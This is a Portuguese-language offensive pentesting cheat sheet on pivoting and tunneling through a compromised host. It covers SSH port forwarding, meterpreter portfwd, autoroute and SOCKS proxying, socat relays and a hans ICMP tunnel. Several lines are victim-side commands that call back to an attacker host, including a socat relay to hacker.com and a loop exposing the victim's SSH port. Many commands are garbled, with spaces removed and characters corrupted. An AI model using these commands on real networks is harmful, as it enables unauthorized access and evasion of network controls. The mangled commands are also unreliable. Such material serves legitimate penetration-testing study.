Abrir uma nova porta no servidor SSH -> Outra porta
ssh-R0.0.0.0:10521:127.0.0.1:1521user@10.0.0.1#Porta local 1521 acessĂvel na porta 10521 de qualquer lugar
ssh-R0.0.0.0:10521:10.0.0.1:1521user@10.0.0.1#Porta remota 1521 acessĂvel na porta 10521 de qualquer lugar
Port2Port
Porta Local -> Host comprometido (SSH) -> Terceira_maquina:Porta
ssh -i ssh_key <usuario>@<ip_comprometido> -L <porta_do_atacante>:<ip_da_vitima>:<porta_remota> [-p <porta_ssh>] [-N -f] #Dessa forma, o terminal ainda está em seu host
#Exemplosudossh-L631:<ip_da_vitima>:631-N-f-l<usuário><ip_comprometido>
Port2hostnet (proxychains)
Porta Local -> Host comprometido (SSH) -> Qualquer lugar
ssh -f -N -D <porta_do_atacante> <usuario>@<ip_comprometido> #Tudo enviado para a porta local irá ser redirecionado para o servidor comprometido (uso como proxy)
TĂşnel - VPN
Você precisa de root em ambos os dispositivos (já que criará novas interfaces) e a configuração do sshd deve permitir o login de root:
PermitRootLogin yesPermitTunnel yes
sshusername@server-wany:any#Isso criará interfaces Tun em ambos os dispositivos.ipaddradd1.1.1.2/32peer1.1.1.1devtun0#Client side VPN IPipaddradd1.1.1.1/32peer1.1.1.2devtun0#Server side VPN IP
Porta Local -> Host comprometido (sessĂŁo ativa) -> Terceira_maquina:Porta
# Inside a meterpreter sessionportfwdadd-l<porta_do_atacante>-p<porta_remota>-r<host_remoto>
Port2hostnet (proxychains)
background#meterpretersessionrouteadd<ip_vitima><máscara_de_rede><sessão># (ex: route add 10.10.10.14 255.255.255.0 8)useauxiliary/server/socks_proxyrun#Proxy port 1080 by defaultecho"socks4 127.0.0.1 1080">/etc/proxychains.conf#Proxychains
Outra forma:
background#meterpreter sessionusepost/multi/manage/autoroutesetSESSION<session_n>setSUBNET<New_net_ip>#Ex: set SUBNET 10.1.13.0setNETMASK<Netmask>runuseauxiliary/server/socks_proxysetVERSION4arun#Proxy port 1080 by defaultecho"socks4 127.0.0.1 1080">/etc/proxychains.conf#Proxychains
#Crie o backdoor do meterpreter na porta 3333 e inicie o listener do msfconsole nessa portaattacker> socatOPENSSL-LISTEN:443,cert=server.pem,cafile=client.crt,reuseaddr,fork,verify=1TCP:127.0.0.1:3333
victim> socat.exe TCP-LISTEN:2222 OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|TCP:hacker.com:443,connect-timeout=5
#Execute o meterpreter
VocĂŞ pode burlar um proxy nĂŁo autenticado executando esta linha em vez da Ăşltima no console da vĂtima:
Crie certificados em ambos os lados: Cliente e Servidor
# Execute este comando em ambos os ladosFILENAME=socatsslopensslgenrsa-out $FILENAME.key1024opensslreq-new-key $FILENAME.key-x509-days3653-out $FILENAME.crtcat $FILENAME.key $FILENAME.crt>$FILENAME.pemchmod600 $FILENAME.key $FILENAME.pem
Conecte a porta SSH local (22) Ă porta 443 do host nĂŁo autorizado
attacker> sudo socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr #Redirect port 2222 to port 443 in localhost
victim> while true; do socat TCP4:<attacker>:443 TCP4:127.0.0.1:22 ; done # Conecte-se à porta 443 do invasor e tudo que vier daqui será redirecionado para a porta 22
attacker> sshlocalhost-p2222-lwww-data-ivulnerable#Conecta-se ao SSH da vĂtima
Plink.exe
É como uma versão de console do PuTTY (as opções são muito semelhantes a um cliente ssh).
./hans-v-f-s1.1.1.1-pP@ssw0rd#Start listening (1.1.1.1 is IP of the new vpn connection)./hans-f-c<server_ip>-pP@ssw0rd-vping1.1.1.100#ApĂłs uma conexĂŁo bem sucedida, A vĂtima estara acessĂvel pelo ip 1.1.1.100